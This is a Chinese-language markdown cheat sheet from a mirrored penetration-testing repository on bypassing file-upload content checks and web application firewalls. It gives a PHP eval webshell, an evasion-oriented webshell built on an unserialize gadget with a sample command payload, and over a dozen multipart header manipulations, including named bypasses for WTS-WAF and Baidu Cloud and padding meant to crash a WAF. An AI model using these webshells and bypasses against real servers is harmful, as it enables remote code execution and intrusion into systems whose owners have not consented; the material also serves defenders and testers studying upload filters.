admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-08-12 11:06:04 +00:00
Code Issues Packages Projects Releases Wiki Activity
Penetration_Testing_POC/books/文件上传内容检测绕过.md
Mrxn c4a74c7e8f add 文件上传内容检测绕过
2020-06-20 14:50:20 +08:00

129 lines
4.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

1.先假设一个前提,可以上传.htaccess或者.user.ini
因为不知道目标使用的是 nginx 还是 Apache所以给两个参考链接
如果是nginx可以看看我这篇文章的0x01 CheckInhttps://www.cnpanda.net/ctf/383.html
如果是apache可以看看这篇文章https://thibaud-robin.fr/articles/bypass-filter-upload/
2.如果检测是`<?php ?>`
可以试一试使用其他标签,如
```
<script language="php">
eval($_POST[2333]);
</script>
```
这个要求`php<7`
或者
```
<?
...
?>
```
3.如果检测的不是php标签是敏感内容的话这里送你一个免杀php马
```php
<?php
if (isset($_POST['run'])) {
class HandShip {
public $name;
public $male;
function __destruct() {
$allin = $this->name;
$allin($this->male);
}
}
if(md5($_POST['code'])=='ce61649168c4550c2f7acab92354dc6e'){
unserialize($_POST['run']);
}
}
?>
```
用法:
`run=O:8:"HandShip":2:{s:4:"name";s:6:"system";s:4:"male";s:9:"cat /home";};&code=panda`
4.绕过思路:对文件的内容,数据。数据包进行处理。
关键点在这里`Content-Disposition: form-data; name="file"; filename="ian.php"`
`form-data; ` 修改为`~form-data;`
5.通过替换大小写来进行绕过
```
Content-Disposition: form-data; name="file"; filename="yjh.php"
Content-Type: application/octet-stream
```
`Content-Disposition` 修改为`content-Disposition`
` form-data` 修改为`Form-data`
`Content-Type` 修改为`content-Type`
6.通过删减空格来进行绕过
```
Content-Disposition: form-data; name="file"; filename="yjh.php"
Content-Type: application/octet-stream
```
`Content-Disposition: form-data` 冒号后面 增加或减少一个空格
`form-data; name="file";` 分号后面 增加或减少一个空格
`Content-Type: application/octet-stream` 冒号后面 增加一个空格
7.通过字符串拼接绕过
`Content-Disposition: form-data; name="file"; filename="yjh3.php"`
` form-data` 修改为 ` f+orm-data`
`from-data` 修改为 `form-d+ata`
8.双文件上传绕过
```html
<form action="https://www.xxx.com/xxx.asp(php)" method="post"
name="form1" enctype="multipart/formdata">
<input name="FileName1" type="FILE" class="tx1" size="40">
<input name="FileName2" type="FILE" class="tx1" size="40">
<input type="submit" name="Submit" value="上传">
</form>
```
9.HTTP header 属性值绕过
`Content-Disposition: form-data; name="file"; filename="yjh.php"`
我们通过替换`form-data``*`来绕过
`Content-Disposition: *; name="file"; filename="yjh.php"`
10.HTTP header 属性名称绕过
源代码:
```
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"
Content-Type: image/png
```
绕过内容如下:
```
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png
C.php"
```
删除掉`ontent-Type: image/png`只留下`c`,将`.php``c`后面即可但是要注意额双引号要跟着c.php".
11.等效替换绕过
原内容:
```
Content-Type: multipart/form-data; boundary=---------------------------471463142114
```
修改后:
```
Content-Type: multipart/form-data; boundary =---------------------------471463142114
```
`boundary`后面加入空格。
12.修改编码绕过
使用`UTF-16``Unicode``双URL编码`等等
13.WTS-WAF 绕过上传
原内容:
```
Content-Disposition: form-data; name="up_picture"; filename="xss.php"
```
添加回车
```
Content-Disposition: form-data; name="up_picture"; filename="xss.php"
```
14.百度云上传绕过
百度云绕过就简单的很多很多在对文件名大小写上面没有检测php是过了的Php就能过或者PHP一句话自己合成图片马用Xise连接即可。
`Content-Disposition: form-data; name="up_picture"; filename="xss.jpg .Php"`
15.填充垃圾数据造成溢出后使WAF崩掉
```
Content-Disposition: 字段溢出即可 比如Content-Disposition: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA一直加就行了十万++
```
Reference in New Issue View Git Blame Copy Permalink